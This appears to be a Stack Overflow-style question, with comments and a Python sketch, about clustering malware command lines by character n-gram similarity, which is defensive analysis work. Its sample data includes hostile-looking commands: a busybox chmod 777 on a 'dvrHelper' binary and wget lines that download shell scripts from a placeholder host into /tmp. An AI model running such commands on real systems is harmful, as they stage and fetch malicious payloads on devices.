How can I cluster commands such as /bin/busybox chmod 777 /dvrHelper without using a bag-of-words representation? Would models like LDA or Word2vec be useful for this goal?

Fritz
  • Can you show your work or some sample code? – Mark Mar 22 '20 at 14:55
  • Did you try bag-of-words and get unsatisfactory results? What sort of commands do you expect to cluster together, and for what ultimate benefit? – gojomo Mar 23 '20 at 01:58
  • I have a dataset of about 10,000 rows. Each row contains a command like the one I wrote above (commands from different types of malware). My goal is to cluster them (the observations are not labeled). I don't think bag-of-words would be a good choice, because it doesn't consider the importance of each individual word or the word order. – Fritz Mar 23 '20 at 12:30
  • Neither word2vec nor LDA is influenced much (or at all) by word order, either. A hunch that a simple, easy-to-apply method like bag-of-words (or bag-of-character-n-grams) wouldn't be good is a guess in the dark. Trying it, seeing what it does, where it offers insights, and where it misses similarities you know to be important would be a step towards choosing further techniques. (If there are associations you'd like a technique to discover and it doesn't, you can then think more clearly: "What kind of info might help cluster these in the way I'd like?") – gojomo Mar 23 '20 at 22:23
  • Also: merely 10k examples of perhaps 2-10 tokens each is very small for any kind of word2vec training, and the individual examples are very short for LDA. You could still try them to see whether there are any interesting results; with a dataset that small you can run many experiments in a short amount of time. Also, having *only* command lines from malware may be less interesting than also including non-malware command lines for contrast. – gojomo Mar 23 '20 at 22:25
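
The bag-of-character-n-grams baseline suggested in the comments can be tried in a few lines. The following is only a minimal sketch using the Python standard library, not a tested method for this dataset. The helper names (`char_ngrams`, `cosine`, `greedy_cluster`), the trigram size, the 0.5 similarity threshold, and every sample command except the first are assumptions made up for illustration. The greedy "first similar seed" grouping is a deliberately crude stand-in for a real clustering algorithm such as k-means or agglomerative clustering.

```python
from collections import Counter
from math import sqrt


def char_ngrams(text, n=3):
    """Return a bag (Counter) of overlapping character n-grams."""
    padded = f" {text.strip()} "  # pad so leading/trailing tokens get boundary n-grams
    return Counter(padded[i:i + n] for i in range(len(padded) - n + 1))


def cosine(a, b):
    """Cosine similarity between two sparse n-gram count vectors."""
    dot = sum(count * b[gram] for gram, count in a.items() if gram in b)
    norm = sqrt(sum(v * v for v in a.values())) * sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0


def greedy_cluster(commands, threshold=0.5, n=3):
    """Put each command in the first cluster whose seed is similar enough.

    The seed of a cluster is simply its first member; the threshold is an
    arbitrary illustrative value that would need tuning on real data.
    """
    seeds = []   # n-gram bag of the first member of each cluster
    labels = []  # cluster index for each command, in input order
    for command in commands:
        bag = char_ngrams(command, n)
        for label, seed in enumerate(seeds):
            if cosine(bag, seed) >= threshold:
                labels.append(label)
                break
        else:
            # No existing cluster is close enough: start a new one.
            seeds.append(bag)
            labels.append(len(seeds) - 1)
    return labels


# Only the first command comes from the question; the rest are hypothetical.
commands = [
    "/bin/busybox chmod 777 /dvrHelper",
    "/bin/busybox chmod 777 /tmp/dvrHelper",
    "wget http://example.invalid/a.sh -O /tmp/a.sh",
    "wget http://example.invalid/b.sh -O /tmp/b.sh",
]
labels = greedy_cluster(commands)
for label, command in zip(labels, commands):
    print(label, command)
```

On these four samples the two busybox lines end up in one group and the two wget lines in another. Inspecting which of the real 10,000 commands do or do not group together under such a baseline is the kind of quick experiment the comments recommend before reaching for word2vec or LDA.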

0 Answers